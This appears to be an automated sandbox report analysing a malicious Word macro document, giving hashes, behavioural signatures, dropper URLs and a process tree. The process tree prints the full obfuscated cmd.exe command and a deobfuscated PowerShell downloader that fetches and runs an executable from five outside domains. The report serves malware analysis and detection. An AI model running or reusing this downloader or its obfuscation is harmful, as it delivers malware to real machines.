Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240419-en -
resource tags
-
submitted
15-05-2024 02:46
General
-
Target
443ae95c2c1e9323ba8ed84249fa07f1_JaffaCakes118.doc
-
Size
230KB
-
MD5
443ae95c2c1e9323ba8ed84249fa07f1
-
SHA1
7f063c638a3b4819d4843619f73b3910d64be552
-
SHA256
39d26726f643a3ca157d4d7e78f10831854f191120a06b95e0ed413fd0170d4f
-
SHA512
73a2d7898ccb3fa31acfc0872c0753fbffcd4af7a0bc012431d47696bf36f32abf68d0c2212ddff8474cd195865cc8f9417a94190e2654fa0e1e9001c184d45a
-
SSDEEP
3072:QvrNNpClULzo5DIzUmcQC8jL/xSu90OoiLuDKZXfwKeljR1v:6tZ7jcQCKxUOmD+XfwLj
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://sarahleighroddis.com/xZs22v11
exe.dropper
http://fbroz.com/COeg4ZZ
exe.dropper
http://thesunavenuequan2.com/UYUiGwf9j
exe.dropper
http://drapart.org/Jvn89HTd2O
exe.dropper
http://ikiw.iniqua.com/oO0OtJVo
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 3 IoCs
-
An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
-
Drops file in Windows directory 1 IoCs
-
Office loads VBA resources, possible macro or embedded object present
-
Modifies Internet Explorer settings 1 TTPs 31 IoCs
-
Modifies registry class 64 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 24 IoCs
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\443ae95c2c1e9323ba8ed84249fa07f1_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\cmd.exec:\wljzn\wijvi\slrzb\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set eLO6=N1qVndw~20kzGl(eD.Y;b9p\/TvBW+=5ouI-8rtZ@OsE:FPM}$UL4yJ)ij h6xg'mfCcH%3{SA,a&&for %Z in (22,32,6,69,46,50,27,51,34,66,44,7,31,74,1,69,37,69,72,43,72,72,34,41,0,0,73,47,43,44,7,35,52,74,1,69,59,69,25,43,47,46,44,7,35,70,74,1,69,13,13,58,49,56,56,56,42,30,63,33,57,6,5,63,19,49,65,4,26,2,30,4,15,6,35,32,20,57,15,67,38,58,0,15,38,17,28,15,20,66,13,56,15,4,38,19,49,59,22,38,59,4,30,63,59,38,38,22,44,24,24,42,75,37,75,59,13,15,56,62,59,37,32,5,5,56,42,17,67,32,64,24,61,39,42,8,8,26,1,1,40,59,38,38,22,44,24,24,65,20,37,32,11,17,67,32,64,24,66,41,15,62,52,39,39,40,59,38,38,22,44,24,24,38,59,15,42,33,4,75,26,15,4,33,15,2,33,75,4,8,17,67,32,64,24,50,18,50,56,12,6,65,21,57,40,59,38,38,22,44,24,24,5,37,75,22,75,37,38,17,32,37,62,24,54,26,4,36,21,68,25,5,8,41,40,59,38,38,22,44,24,24,56,10,56,6,17,56,4,56,2,33,75,17,67,32,64,24,32,41,9,41,38,54,3,32,63,17,72,22,13,56,38,14,63,40,63,55,19,49,65,13,32,6,59,30,63,26,13,13,6,4,63,19,49,38,67,22,11,38,58,30,58,63,60,70,63,19,49,32,64,56,10,30,63,57,10,59,22,63,19,49,42,33,22,56,22,30,49,15,4,26,44,38,15,64,22,29,63,23,63,29,49,38,67,22,11,38,29,63,17,15,61,15,63,19,65,32,37,15,75,67,59,14,49,42,22,6,22,13,58,56,4,58,49,59,22,38,59,4,55,71,38,37,53,71,49,65,4,26,2,17,16,32,6,4,13,32,75,5,45,56,13,15,14,49,42,22,6,22,13,74,58,49,42,33,22,56,22,55,19,49,5,6,64,26,30,63,2,42,65,65,63,19,34,65,58,14,14,12,15,38,35,34,38,15,64,58,49,42,33,22,56,22,55,17,13,15,4,62,38,59,58,35,62,15,58,52,9,9,9,9,55,58,71,34,4,26,32,10,15,35,34,38,15,64,58,49,42,33,22,56,22,19,49,11,5,5,20,30,63,26,37,64,5,63,19,20,37,15,75,10,19,48,48,67,75,38,67,59,71,48,48,49,33,42,57,11,6,30,63,57,13,38,64,63,19,78)do set oqw=!oqw!!eLO6:~%Z,1!&&if %Z==78 echo !oqw:~5!|cmd.exe"2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeCmD /V:ON/C"set eLO6=N1qVndw~20kzGl(eD.Y;b9p\/TvBW+=5ouI-8rtZ@OsE:FPM}$UL4yJ)ij h6xg'mfCcH%3{SA,a&&for %Z in (22,32,6,69,46,50,27,51,34,66,44,7,31,74,1,69,37,69,72,43,72,72,34,41,0,0,73,47,43,44,7,35,52,74,1,69,59,69,25,43,47,46,44,7,35,70,74,1,69,13,13,58,49,56,56,56,42,30,63,33,57,6,5,63,19,49,65,4,26,2,30,4,15,6,35,32,20,57,15,67,38,58,0,15,38,17,28,15,20,66,13,56,15,4,38,19,49,59,22,38,59,4,30,63,59,38,38,22,44,24,24,42,75,37,75,59,13,15,56,62,59,37,32,5,5,56,42,17,67,32,64,24,61,39,42,8,8,26,1,1,40,59,38,38,22,44,24,24,65,20,37,32,11,17,67,32,64,24,66,41,15,62,52,39,39,40,59,38,38,22,44,24,24,38,59,15,42,33,4,75,26,15,4,33,15,2,33,75,4,8,17,67,32,64,24,50,18,50,56,12,6,65,21,57,40,59,38,38,22,44,24,24,5,37,75,22,75,37,38,17,32,37,62,24,54,26,4,36,21,68,25,5,8,41,40,59,38,38,22,44,24,24,56,10,56,6,17,56,4,56,2,33,75,17,67,32,64,24,32,41,9,41,38,54,3,32,63,17,72,22,13,56,38,14,63,40,63,55,19,49,65,13,32,6,59,30,63,26,13,13,6,4,63,19,49,38,67,22,11,38,58,30,58,63,60,70,63,19,49,32,64,56,10,30,63,57,10,59,22,63,19,49,42,33,22,56,22,30,49,15,4,26,44,38,15,64,22,29,63,23,63,29,49,38,67,22,11,38,29,63,17,15,61,15,63,19,65,32,37,15,75,67,59,14,49,42,22,6,22,13,58,56,4,58,49,59,22,38,59,4,55,71,38,37,53,71,49,65,4,26,2,17,16,32,6,4,13,32,75,5,45,56,13,15,14,49,42,22,6,22,13,74,58,49,42,33,22,56,22,55,19,49,5,6,64,26,30,63,2,42,65,65,63,19,34,65,58,14,14,12,15,38,35,34,38,15,64,58,49,42,33,22,56,22,55,17,13,15,4,62,38,59,58,35,62,15,58,52,9,9,9,9,55,58,71,34,4,26,32,10,15,35,34,38,15,64,58,49,42,33,22,56,22,19,49,11,5,5,20,30,63,26,37,64,5,63,19,20,37,15,75,10,19,48,48,67,75,38,67,59,71,48,48,49,33,42,57,11,6,30,63,57,13,38,64,63,19,78)do set oqw=!oqw!!eLO6:~%Z,1!&&if %Z==78 echo !oqw:~5!|cmd.exe"3⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $iiis='ujwd';$fnvq=new-object Net.WebClient;$hpthn='http://sarahleighroddis.com/xZs22v11@http://fbroz.com/COeg4ZZ@http://thesunavenuequan2.com/UYUiGwf9j@http://drapart.org/Jvn89HTd2O@http://ikiw.iniqua.com/oO0OtJVo'.Split('@');$flowh='vllwn';$tcpzt = '63';$omik='jkhp';$supip=$env:temp+'\'+$tcpzt+'.exe';foreach($spwpl in $hpthn){try{$fnvq.DownloadFile($spwpl, $supip);$dwmv='qsff';If ((Get-Item $supip).length -ge 40000) {Invoke-Item $supip;$zddb='vrmd';break;}}catch{}}$usjzw='jltm';"4⤵
-
-
C:\Windows\SysWOW64\cmd.execmd.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell $iiis='ujwd';$fnvq=new-object Net.WebClient;$hpthn='http://sarahleighroddis.com/xZs22v11@http://fbroz.com/COeg4ZZ@http://thesunavenuequan2.com/UYUiGwf9j@http://drapart.org/Jvn89HTd2O@http://ikiw.iniqua.com/oO0OtJVo'.Split('@');$flowh='vllwn';$tcpzt = '63';$omik='jkhp';$supip=$env:temp+'\'+$tcpzt+'.exe';foreach($spwpl in $hpthn){try{$fnvq.DownloadFile($spwpl, $supip);$dwmv='qsff';If ((Get-Item $supip).length -ge 40000) {Invoke-Item $supip;$zddb='vrmd';break;}}catch{}}$usjzw='jltm';5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
20KB
MD5ee125666372381cfe188d413b9e37c3c
SHA1b4eebafbe0071a6663307f995337ec7bd8d32af3
SHA25647ca3ee21e29979832203447ab25dbb120a32bdb8a914b10fb316fb191934c88
SHA5127914371f8a1f9b1e85afcf3523291dcc454435911ecadf79707f0369fcdbe0e26ad3b6490cb61a8fac2dd4df98100a3fdded5ba37852a1ad81249ad586e153b6
-
Filesize
1024KB
-
Filesize
44KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
44KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
44KB
-
Filesize
1024KB
-
Filesize
64KB
-
Filesize
4KB